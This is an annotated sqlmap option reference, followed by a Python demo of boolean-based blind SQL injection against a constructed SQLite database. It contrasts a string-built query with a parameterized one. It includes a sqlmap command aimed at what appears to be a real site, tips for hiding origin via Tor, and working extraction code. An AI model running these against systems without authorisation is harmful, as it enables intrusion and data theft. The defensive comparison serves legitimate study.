sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over database servers. It comes with a powerful detection engine, many niche features for the experienced penetration tester and a broad range of switches spanning database fingerprinting, data fetching from the database, accessing the underlying file system and executing commands on the operating system via out-of-band connections.
Usage: sqlmap.py [options]
-h, --help Show help
--version Show version
-u URL, --url=URL Target URL (e.g. "http://www.site.com/vuln.php?id=1") # The most common option: the injection point URL to test.
-g GOOGLEDORK Process Google dork results as target URLs # Pulls targets from Google search results; needs unblocked access to Google (a proxy or VPN where it is filtered).
These options can be used to specify how to connect to the target URL
--data=DATA Data string to be sent through POST # Used for POST injection: the body parameters to test.
--cookie=COOKIE HTTP Cookie header value # Used for cookie injection, or to stay authenticated while testing.
--random-agent Use randomly selected HTTP User-Agent header value # Random browser User-Agent; sqlmap's default one is widely blocked.
--proxy=PROXY Use a proxy to connect to the target URL # Proxy setting; commonly used and important (e.g. to route through Burp).
--tor Use Tor anonymity network # Route traffic over Tor to hide the tester's origin.
--check-tor Check to see if Tor is used properly # Verify that requests really leave via Tor before testing.
These options can be used to specify which parameters to test for,
provide custom injection payloads and optional tampering scripts
-p TESTPARAMETER Testable parameter(s)
--dbms=DBMS Force back-end DBMS to this value # Skips fingerprinting; only use it when the database type is already known (e.g. mysql, oracle, mssql).
These options can be used to customize the detection phase
--level=LEVEL Level of tests to perform (1-5, default 1) # Thoroughness, not "security level": higher levels send more payloads and test more inputs (level 2 adds Cookie headers, level 3 adds User-Agent and Referer).
--risk=RISK Risk of tests to perform (1-3, default 1) # Aggressiveness: risk 2 adds heavy time-based queries, risk 3 adds OR-based tests that can modify data if the injection lands in an UPDATE or DELETE.
These options can be used to tweak testing of specific SQL injection techniques
--technique=TECH SQL injection techniques to use (default "BEUSTQ") # B boolean-based blind, E error-based, U UNION query, S stacked queries, T time-based blind, Q inline queries.
These options can be used to enumerate the back-end database
management system information, structure and data contained in the
tables. Moreover you can run your own SQL statements
-a, --all Retrieve everything
-b, --banner Retrieve DBMS banner # DBMS version string
--current-user Retrieve DBMS current user # The database account the application connects as
--current-db Retrieve DBMS current database # The database the application is using
--passwords Enumerate DBMS users password hashes # DBMS account hashes, not application users
--tables Enumerate DBMS database tables # Tables of the database given with -D
--columns Enumerate DBMS database table columns # Columns of the table given with -T
--schema Enumerate DBMS schema # Databases, tables and columns in one pass
--dump Dump DBMS database table entries # Rows of the selected table(s)
--dump-all Dump all DBMS databases tables entries # Rows of every table in every database
-D DB DBMS database to enumerate # Database to focus on (used with --tables, --columns, --dump)
-T TBL DBMS database table(s) to enumerate # Table(s) to focus on (used with --columns, --dump)
-C COL DBMS database table column(s) to enumerate # Column(s) to focus on (used with --dump)
--is-dba Detect if the DBMS current user is DBA # Privileges of the current database user
--dbs Enumerate DBMS databases # List all databases
Operating system access:
These options can be used to access the back-end database management
system underlying operating system
--os-shell Prompt for an interactive operating system shell # Only works with a privileged database account (typically DBA) and a DBMS or writable web directory that lets sqlmap run commands.
--os-pwn Prompt for an OOB shell, Meterpreter or VNC # Out-of-band shell via Metasploit (Meterpreter or VNC session).
These options can be used to set some general working parameters
--batch Never ask for user input, use the default behaviour # Answer every prompt with the default; normally used when scanning many injection points unattended.
--flush-session Flush session files for current target # Discard the cached results for this target and start over.
--sqlmap-shell Prompt for an interactive sqlmap shell # Start an interactive sqlmap prompt.
--wizard Simple wizard interface for beginner users # Guided mode for beginners.
D:\sqlmap>c:\Python27\python.exe sqlmap.py -u http://www.kanghu1.net/Feedback_new.asp?ArticleID=1892 --is-dba
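What sqlmap does behind a command like the one above is not magic: with --technique=B it asks the same page a long series of true/false questions and reads the answer off whether the article still renders. The following is an added example, not code from sqlmap or from the original post. It builds a constructed SQLite database with an admin table, a deliberately vulnerable ArticleID lookup of the kind the URL above suggests, then recovers a table name (what --tables learns) and a password (what --dump learns) through boolean-based blind extraction, bisecting each character's code point the way sqlmap does. The same extraction is then run against a parameterized version of the lookup to show why the oracle goes silent. Table and column names, the sample rows and the value 1892 as the known-good ArticleID are all assumptions for the demo.

```python
import sqlite3


def make_db():
    """Constructed sample database standing in for the feedback application's."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE feedback(ArticleID INTEGER, body TEXT);
        INSERT INTO feedback VALUES (1892, 'great article'), (7, 'meh');
        CREATE TABLE admin(username TEXT, password TEXT);
        INSERT INTO admin VALUES ('webmaster', 'hunter2');
    """)
    return conn


def vulnerable_lookup(conn, article_id):
    """The ?ArticleID=1892 handler as sqlmap hopes to find it: the parameter is
    pasted straight into the query, so anything after the number is executed."""
    return conn.execute(
        f"SELECT body FROM feedback WHERE ArticleID={article_id}").fetchall()


def safe_lookup(conn, article_id):
    """Same query with a bound parameter: the driver ships the value separately,
    so 'AND ...' is compared as a string and never parsed as SQL."""
    return conn.execute(
        "SELECT body FROM feedback WHERE ArticleID=?", (article_id,)).fetchall()


def blind_extract(lookup, conn, subquery, max_len=32):
    """Boolean-based blind extraction (sqlmap --technique=B).

    The only signal used is whether the page still shows the article, i.e.
    whether the injected AND-condition was true. Each character is found by
    bisecting its code point over 7-bit ASCII (7 requests per character)
    rather than trying every printable character, as sqlmap also does.
    Returns the recovered string and the number of requests it cost."""
    requests = 0

    def oracle(condition):
        nonlocal requests
        requests += 1
        # 1892 is the known-good ArticleID (assumed); rows come back only if
        # the appended condition is true.
        return bool(lookup(conn, f"1892 AND ({condition})"))

    result = ""
    for pos in range(1, max_len + 1):
        if not oracle(f"length(({subquery})) >= {pos}"):
            break                      # past the end of the value
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(f"unicode(substr(({subquery}), {pos}, 1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        result += chr(lo)
    return result, requests


if __name__ == "__main__":
    db = make_db()
    # What --tables would learn: the first table other than the one being queried.
    table, n = blind_extract(
        vulnerable_lookup, db,
        "SELECT name FROM sqlite_master WHERE type='table' AND name!='feedback'")
    print(f"table: {table!r} in {n} requests")
    # What --dump would then pull out of it.
    secret, n = blind_extract(vulnerable_lookup, db, "SELECT password FROM admin")
    print(f"admin password: {secret!r} in {n} requests")
    # Against the parameterized lookup the very first question comes back false.
    print("parameterized:", blind_extract(safe_lookup, db, "SELECT password FROM admin"))
```

Two things worth noticing when reading the request counts: a seven-character secret costs 57 requests even with bisection (8 per character plus one to detect the end), which is why sqlmap prefers UNION or error-based techniques when they are available and falls back to blind ones, and why --level/--risk trade coverage against request volume. The parameterized version is not "filtering" the payload; it simply compares the whole string against the integer column, so the condition is never evaluated.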